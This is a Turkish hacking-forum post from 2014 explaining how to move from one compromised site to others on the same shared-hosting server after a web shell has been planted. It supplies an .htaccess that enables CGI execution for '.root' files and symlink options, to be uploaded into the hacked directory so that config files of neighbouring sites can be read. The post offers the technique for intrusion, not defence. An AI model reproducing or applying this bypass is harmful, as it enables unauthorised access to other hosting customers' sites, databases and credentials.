THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Okunmayan Config'e Bypass

ByPro55 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2014
Nereden:
world..
Mesajlar:
842
Konular:
101
Teşekkür (Etti):
23
Teşekkür (Aldı):
228
Ticaret:
(0) %
23-05-2014 17:21
#1
Cool
Okunmayan Config'e Bypass
Okunmayan Config'e Bypass

Sitemiz kapalı iken, boşta durmayıp, çalışmalarıma devam etmiş idim.
Bir sitede arkadaşın biri güzel bir konuya değinmiş idi, test ettim gerçekten faydasını da gördüm.

Şöyle ki;
Bunu anlatan arkadaş bu bilgiyi yabancı bir formdan aldığını ifade ederek, Config' e Bypass hakkında anlatım yapmıştı.

Bir SW girdik config çekiyoruz, ama Configte site yok Bunların sebebi ne olabilir ?

Server Sahibi zengindir. SW kapatmiştir bir tek o site barınıyordur yada sunucu ona aittir.

Ya da Hosting Firması Serverde HD bölüme yapmıştır, yani HD böldürme derken mesala biz A sitesinde açık bulup B sitesine geçeceğiz ama A sitesiyle B sitesinin arasında duvar var, biz bu duvarı geçemiyoruz. Peki ne yapabiliriz ?

Duvarın üstünden atlayabiliriz, buda Bypass

Config' i cektigimiz Dizine Verilen kodları upload ediyoruz.



.htaccess Oluşturalim Alttaki Kodları Kaydedelim.

Kod:
# For security reasons, Option followsymlinks cannot be overridden.
#Options FollowSymLinks MultiViews Indexes ExecCGI
Options SymLinksIfOwnerMatch MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root
Config'i cektigimiz dizine verilen kodlar upload edilecektir.

Mesala Config hangi dizinde ise, örneğin ana dizin ornek verecek olursak http://www.site.com/configweb
Ozaman yüklediğimiz dosyada o bicim olacak http://www.site.com/.htaccess

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler